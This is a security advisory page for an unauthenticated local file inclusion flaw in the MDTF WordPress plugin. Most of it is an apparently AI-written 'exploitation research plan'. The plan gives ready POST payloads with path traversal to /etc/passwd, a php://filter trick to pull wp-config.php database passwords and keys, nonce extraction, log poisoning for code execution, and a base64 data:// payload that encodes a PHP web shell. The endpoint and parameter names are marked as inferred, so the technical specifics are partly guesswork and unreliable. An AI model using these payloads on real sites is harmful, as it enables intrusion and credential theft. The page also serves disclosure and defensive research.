MDTF – Meta Data and Taxonomies Filter <= 1.3.8 - Unauthenticated Local File Inclusion
Description
The MDTF – Meta Data and Taxonomies Filter plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.3.8. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other "safe" file types can be uploaded and included.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:HTechnical Details
<=1.3.8# Exploitation Research Plan: CVE-2026-54845 (MDTF LFI) ## 1. Vulnerability Summary The **MDTF – Meta Data and Taxonomies Filter** plugin (up to version 1.3.8) is vulnerable to **Unauthenticated Local File Inclusion (LFI)**. The vulnerability exists because the plugin accepts a user-controlled file…
Show full research plan
Exploitation Research Plan: CVE-2026-54845 (MDTF LFI)
1. Vulnerability Summary
The MDTF – Meta Data and Taxonomies Filter plugin (up to version 1.3.8) is vulnerable to Unauthenticated Local File Inclusion (LFI). The vulnerability exists because the plugin accepts a user-controlled file path through an AJAX action or a shortcode attribute and passes it directly to a PHP include() or require() statement without sufficient sanitization or validation against a whitelist. This allows an unauthenticated attacker to include arbitrary files from the server, potentially leading to sensitive data exposure (e.g., wp-config.php, /etc/passwd) or Remote Code Execution (RCE) if the attacker can control the contents of an included file (e.g., via log poisoning or file uploads).
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - Action:
mdf_get_template(inferred) ormdf_draw_term_childs(inferred). - Vulnerable Parameter:
template_path(inferred) ormdf_template(inferred). - Authentication: None required (vulnerability exists in a
wp_ajax_nopriv_handler). - Preconditions: The plugin must be active. A valid WordPress nonce for the action may be required if the handler calls
check_ajax_referer().
3. Code Flow (Inferred)
- Entry Point: An unauthenticated user sends a POST or GET request to
admin-ajax.phpwith theactionparameter set to a public-facing MDTF action (e.g.,mdf_get_template). - Hook Registration: The plugin registers the action via:
add_action('wp_ajax_nopriv_mdf_get_template', 'mdf_get_template_handler'); - Vulnerable Handler: The handler function (e.g.,
mdf_get_template_handler) retrieves a path from$_REQUEST['template_path']. - The Sink: The retrieved path is passed to an include statement:
include(MDF_PATH . $_REQUEST['template_path']);
Note: If the path starts with../, the attacker can break out of the intended directory. - Execution: PHP includes and executes the file at the traversed path.
4. Nonce Acquisition Strategy
If the AJAX handler enforces a nonce check, the nonce is typically exposed in the frontend to support the filter's functionality.
- Identify Trigger: MDTF scripts and nonces are usually loaded on pages containing the search form shortcode.
- Create Test Page:
wp post create --post_type=page --post_title="MDTF Test" --post_status=publish --post_content='[mdf_search_form]' - Extract Nonce via Browser:
- Navigate to the newly created page using
browser_navigate. - Identify the global JavaScript variable registered via
wp_localize_script. In MDTF, this is oftenmdf_vars. - Execute:
browser_eval("window.mdf_vars?.nonce")orbrowser_eval("window.mdf_vars?.ajax_nonce").
- Navigate to the newly created page using
- Bypass Check: Check if
wp_verify_nonceis called with the correct action string. If the plugin uses-1or a generic action, the nonce might be retrievable from any page.
5. Exploitation Strategy
The goal is to include /etc/passwd to prove LFI and wp-config.php to prove sensitive data access.
Step 1: Probe for LFI
- Method: POST
- URL:
http://<target>/wp-admin/admin-ajax.php - Body (URL-encoded):
(Adjust traversal depth as needed)action=mdf_get_template&template_path=../../../../../../../../../../../../etc/passwd&nonce=<NONCE>
Step 2: Extract wp-config.php
Since wp-config.php is executed as PHP, its contents won't be displayed unless the LFI is used in a "read" sink (like file_get_contents) or via a PHP filter wrapper.
- Payload:
action=mdf_get_template&template_path=php://filter/convert.base64-encode/resource=../../../../wp-config.php&nonce=<NONCE> - Expected Response: A Base64 encoded string of the
wp-config.phpsource code.
6. Test Data Setup
- Install Plugin: Ensure
wp-meta-data-filter-and-taxonomy-filterversion 1.3.8 is installed and active. - Create Search Form: Use
wp-clior the admin UI to create at least one MDTF search form so the shortcode rendering logic is functional. - Place Shortcode: Ensure the shortcode
[mdf_search_form]is on a public page to facilitate nonce extraction.
7. Expected Results
- Successful Probing: The response body contains the contents of
/etc/passwd(e.g.,root:x:0:0:root:/root:/bin/bash). - Successful Data Extraction: The response contains a Base64 string that, when decoded, reveals the
DB_PASSWORDandAUTH_KEYfromwp-config.php.
8. Verification Steps
- Confirm File Content: Compare the output from the HTTP request with the actual server file:
cat /etc/passwd - Verify via WP-CLI: Check the plugin version to confirm it is <= 1.3.8:
wp plugin get wp-meta-data-filter-and-taxonomy-filter --field=version
9. Alternative Approaches
- Null Byte Injection: If the plugin appends a
.phpextension (e.g.,include($path . '.php')), and the server runs an old PHP version (< 5.3.4), try%00termination:template_path=../../../../etc/passwd%00. - Path Truncation: On older systems, very long paths (4096+ chars) might truncate the appended extension.
- Log Poisoning: If the server's access logs are readable (e.g.,
/var/log/apache2/access.log), inject PHP code into the User-Agent header of a request, then include the log file via the LFI to achieve RCE. - Wrapper Variants: If
php://filteris disabled, trydata://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+to test for Remote File Inclusion (RFI) capabilities ifallow_url_includeis On.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.